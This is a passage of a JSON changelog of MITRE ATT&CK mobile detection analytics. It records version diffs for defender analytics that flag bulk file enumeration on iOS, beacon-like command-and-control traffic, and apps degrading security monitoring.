                    "description": "Defender observes an app (bundle/process) performing large-scope directory listings or metadata reads via FileProvider/NSFileManager against user-visible containers (Files app locations, iCloud/On-My-iPhone) or external providers, with rapid traversal across many folders while the app is backgrounded or without corresponding UI activity (unifiedlogs:FileProvider, unifiedlogs:FileIO). Optional signals include Photo library or document picker bulk enumeration absent recent user gesture. Correlate on bundle/process/profile and path volume within a bounded window.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "iOS:unifiedlog",
                            "channel": "readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\ My\\\\ iPhone with >N distinct paths in TimeWindow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "iOS:unifiedlog",
                            "channel": "UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Correlation window between enumeration API calls and path bursts (e.g., 30\u2013300s)."
                        },
                        {
                            "field": "MinDistinctPaths",
                            "description": "Minimum number of unique paths to flag discovery (e.g., \u226540)."
                        },
                        {
                            "field": "TargetPathRegex",
                            "description": "Enterprise-relevant containers/providers to include/exclude."
                        },
                        {
                            "field": "RequireBackgroundState",
                            "description": "Set true to require background discovery for higher confidence."
                        },
                        {
                            "field": "AllowlistedBundles",
                            "description": "Legitimate backup/DLP/file-management apps to suppress."
                        },
                        {
                            "field": "ManagedProfileScope",
                            "description": "Limit to managed devices/profiles."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Correlation window between enumeration API calls and path bursts (e.g., 30\\u2013300s).\"}, {\"field\": \"MinDistinctPaths\", \"description\": \"Minimum number of unique paths to flag discovery (e.g., \\u226540).\"}, {\"field\": \"TargetPathRegex\", \"description\": \"Enterprise-relevant containers/providers to include/exclude.\"}, {\"field\": \"RequireBackgroundState\", \"description\": \"Set true to require background discovery for higher confidence.\"}, {\"field\": \"AllowlistedBundles\", \"description\": \"Legitimate backup/DLP/file-management apps to suppress.\"}, {\"field\": \"ManagedProfileScope\", \"description\": \"Limit to managed devices/profiles.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-18 19:33:15.080000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an app (bundle/process) performing large-scope directory listings or metadata reads via FileProvider/NSFileManager against user-visible containers (Files app locations, iCloud/On-My-iPhone) or external providers, with rapid traversal across many folders while the app is backgrounded or without corresponding UI activity (unifiedlogs:FileProvider, unifiedlogs:FileIO). Optional signals include Photo library or document picker bulk enumeration absent recent user gesture. Correlate on bundle/process/profile and path volume within a bounded window.\", \"old_value\": \"On Android, the user is presented with a permissions popup when an application requests access to external device storage.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71\", \"name\": \"iOS:unifiedlog\", \"channel\": \"readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\\\\\ My\\\\\\\\ iPhone with >N distinct paths in TimeWindow\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to208__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to208__0\"><a href=\"#difflib_chg_to208__top\">t</a></td><td class=\"diff_header\" id=\"from208_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">On&nbsp;Android,&nbsp;the&nbsp;user&nbsp;is&nbsp;presented&nbsp;with&nbsp;a&nbsp;permissions&nbsp;popup&nbsp;w</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to208__top\">t</a></td><td class=\"diff_header\" id=\"to208_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;app&nbsp;(bundle/process)&nbsp;performing&nbsp;large-s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">hen&nbsp;an&nbsp;application&nbsp;requests&nbsp;access&nbsp;to&nbsp;external&nbsp;device&nbsp;storag</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cope&nbsp;directory&nbsp;listings&nbsp;or&nbsp;metadata&nbsp;reads&nbsp;via&nbsp;FileProvider/N</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">SFileManager&nbsp;against&nbsp;user-visible&nbsp;containers&nbsp;(Files&nbsp;app&nbsp;loca</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tions,&nbsp;iCloud/On-My-iPhone)&nbsp;or&nbsp;external&nbsp;providers,&nbsp;with&nbsp;rapi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;traversal&nbsp;across&nbsp;many&nbsp;folders&nbsp;while&nbsp;the&nbsp;app&nbsp;is&nbsp;backgrounde</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;or&nbsp;without&nbsp;corresponding&nbsp;UI&nbsp;activity&nbsp;(unifiedlogs:FileProv</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ider,&nbsp;unifiedlogs:FileIO).&nbsp;Optional&nbsp;signals&nbsp;include&nbsp;Photo&nbsp;li</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">brary&nbsp;or&nbsp;document&nbsp;picker&nbsp;bulk&nbsp;enumeration&nbsp;absent&nbsp;recent&nbsp;user</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;gesture.&nbsp;Correlate&nbsp;on&nbsp;bundle/process/profile&nbsp;and&nbsp;path&nbsp;volum</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;within&nbsp;a&nbsp;bounded&nbsp;window.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--d11da2b2-1552-4a54-b268-3df1cb877cf6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-04 23:55:34.960000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0685#AN1793",
                            "external_id": "AN1793"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1793",
                    "description": "A defender observes an application establishing application-layer network sessions (e.g., HTTP(S), WebSocket, DNS, SMTP/IMAP) with destinations and request patterns that deviate from the enterprise baseline for that app category, especially when sessions occur during background execution or while the device is locked and exhibit beacon-like periodicity, anomalous SNI/Host patterns, or suspicious request/response size symmetry consistent with command polling and tasking over legitimate-looking protocols.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "NSM:Flow",
                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "BeaconIntervalVarianceThreshold",
                            "description": "Defines acceptable periodicity variance for network communications"
                        },
                        {
                            "field": "ConnectionFrequencyThreshold",
                            "description": "Baseline-dependent threshold for anomalous connection rates"
                        },
                        {
                            "field": "PayloadEntropyThreshold",
                            "description": "Defines anomaly conditions for encoded or structured payload content"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"NSM:Flow\", \"channel\": \"Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"BeaconIntervalVarianceThreshold\", \"description\": \"Defines acceptable periodicity variance for network communications\"}, {\"field\": \"ConnectionFrequencyThreshold\", \"description\": \"Baseline-dependent threshold for anomalous connection rates\"}, {\"field\": \"PayloadEntropyThreshold\", \"description\": \"Defines anomaly conditions for encoded or structured payload content\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-04 23:55:34.960000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A defender observes an application establishing application-layer network sessions (e.g., HTTP(S), WebSocket, DNS, SMTP/IMAP) with destinations and request patterns that deviate from the enterprise baseline for that app category, especially when sessions occur during background execution or while the device is locked and exhibit beacon-like periodicity, anomalous SNI/Host patterns, or suspicious request/response size symmetry consistent with command polling and tasking over legitimate-looking protocols.\", \"old_value\": \"Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to85__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to85__0\"><a href=\"#difflib_chg_to85__top\">t</a></td><td class=\"diff_header\" id=\"from85_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Abuse&nbsp;of&nbsp;standard&nbsp;application&nbsp;protocols&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to85__top\">t</a></td><td class=\"diff_header\" id=\"to85_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;defender&nbsp;observes&nbsp;an&nbsp;application&nbsp;establishing&nbsp;application-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">detect&nbsp;as&nbsp;many&nbsp;legitimate&nbsp;mobile&nbsp;applications&nbsp;leverage&nbsp;such&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">layer&nbsp;network&nbsp;sessions&nbsp;(e.g.,&nbsp;HTTP(S),&nbsp;WebSocket,&nbsp;DNS,&nbsp;SMTP/</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">protocols&nbsp;for&nbsp;language-specific&nbsp;APIs.&nbsp;Enterprises&nbsp;may&nbsp;be&nbsp;bet</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">IMAP)&nbsp;with&nbsp;destinations&nbsp;and&nbsp;request&nbsp;patterns&nbsp;that&nbsp;deviate&nbsp;fr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ter&nbsp;served&nbsp;focusing&nbsp;on&nbsp;detection&nbsp;at&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversar</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">om&nbsp;the&nbsp;enterprise&nbsp;baseline&nbsp;for&nbsp;that&nbsp;app&nbsp;category,&nbsp;especially</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;when&nbsp;sessions&nbsp;occur&nbsp;during&nbsp;background&nbsp;execution&nbsp;or&nbsp;while&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;device&nbsp;is&nbsp;locked&nbsp;and&nbsp;exhibit&nbsp;beacon-like&nbsp;periodicity,&nbsp;anom</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">alous&nbsp;SNI/Host&nbsp;patterns,&nbsp;or&nbsp;suspicious&nbsp;request/response&nbsp;size</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;symmetry&nbsp;consistent&nbsp;with&nbsp;command&nbsp;polling&nbsp;and&nbsp;tasking&nbsp;over&nbsp;l</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">egitimate-looking&nbsp;protocols.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9396ec3f-2189-44d1-9c88-53ee3603236c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-04 23:56:19.093000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0685#AN1794",
                            "external_id": "AN1794"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1794",
                    "description": "A defender observes an application generating application-layer communications that blend with normal traffic (HTTP(S), WebSocket, DNS, mail protocols) but show deviations from enterprise baselines for that bundle ID\u2014such as persistent background network sessions, regular low-volume polling intervals, anomalous SNI/Host destinations, uncommon DNS patterns, or uniform request/response sizing\u2014suggesting command and control over legitimate-looking protocols without relying on tool signatures.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "NSM:Flow",
                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "CadenceAnomalyThreshold",
                            "description": "Defines acceptable deviation in protocol communication timing"
                        },
                        {
                            "field": "SessionPersistenceThreshold",
                            "description": "Baseline deviation tolerance for long-lived sessions"
                        },
                        {
                            "field": "AppNetworkBehaviorBaseline",
                            "description": "Expected mapping of application functionality to protocol usage"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"NSM:Flow\", \"channel\": \"Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"CadenceAnomalyThreshold\", \"description\": \"Defines acceptable deviation in protocol communication timing\"}, {\"field\": \"SessionPersistenceThreshold\", \"description\": \"Baseline deviation tolerance for long-lived sessions\"}, {\"field\": \"AppNetworkBehaviorBaseline\", \"description\": \"Expected mapping of application functionality to protocol usage\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-04 23:56:19.093000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A defender observes an application generating application-layer communications that blend with normal traffic (HTTP(S), WebSocket, DNS, mail protocols) but show deviations from enterprise baselines for that bundle ID\\u2014such as persistent background network sessions, regular low-volume polling intervals, anomalous SNI/Host destinations, uncommon DNS patterns, or uniform request/response sizing\\u2014suggesting command and control over legitimate-looking protocols without relying on tool signatures.\", \"old_value\": \"Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to81__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to81__0\"><a href=\"#difflib_chg_to81__top\">t</a></td><td class=\"diff_header\" id=\"from81_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Abuse&nbsp;of&nbsp;standard&nbsp;application&nbsp;protocols&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to81__top\">t</a></td><td class=\"diff_header\" id=\"to81_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;defender&nbsp;observes&nbsp;an&nbsp;application&nbsp;generating&nbsp;application-la</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">detect&nbsp;as&nbsp;many&nbsp;legitimate&nbsp;mobile&nbsp;applications&nbsp;leverage&nbsp;such&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">yer&nbsp;communications&nbsp;that&nbsp;blend&nbsp;with&nbsp;normal&nbsp;traffic&nbsp;(HTTP(S),&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">protocols&nbsp;for&nbsp;language-specific&nbsp;APIs.&nbsp;Enterprises&nbsp;may&nbsp;be&nbsp;bet</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">WebSocket,&nbsp;DNS,&nbsp;mail&nbsp;protocols)&nbsp;but&nbsp;show&nbsp;deviations&nbsp;from&nbsp;ent</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ter&nbsp;served&nbsp;focusing&nbsp;on&nbsp;detection&nbsp;at&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversar</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">erprise&nbsp;baselines&nbsp;for&nbsp;that&nbsp;bundle&nbsp;ID\u2014such&nbsp;as&nbsp;persistent&nbsp;back</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ground&nbsp;network&nbsp;sessions,&nbsp;regular&nbsp;low-volume&nbsp;polling&nbsp;interval</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s,&nbsp;anomalous&nbsp;SNI/Host&nbsp;destinations,&nbsp;uncommon&nbsp;DNS&nbsp;patterns,&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;uniform&nbsp;request/response&nbsp;sizing\u2014suggesting&nbsp;command&nbsp;and&nbsp;con</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">trol&nbsp;over&nbsp;legitimate-looking&nbsp;protocols&nbsp;without&nbsp;relying&nbsp;on&nbsp;to</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ol&nbsp;signatures.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--e13d662d-a496-4997-b26a-39e71eb17fc2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:37.215000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0687#AN1797",
                            "external_id": "AN1797"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1797",
                    "description": "Correlates (1) application-driven modification of device security posture or monitoring capability (e.g., accessibility abuse, disabling security app components, altering monitoring configuration), (2) immediate degradation or cessation of expected telemetry sources such as mobile EDR, sensor visibility, or system monitoring, and (3) subsequent application activity continuing with reduced observability. The defender observes a causal chain where defensive visibility or enforcement is altered first, followed by continued execution under reduced monitoring conditions.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
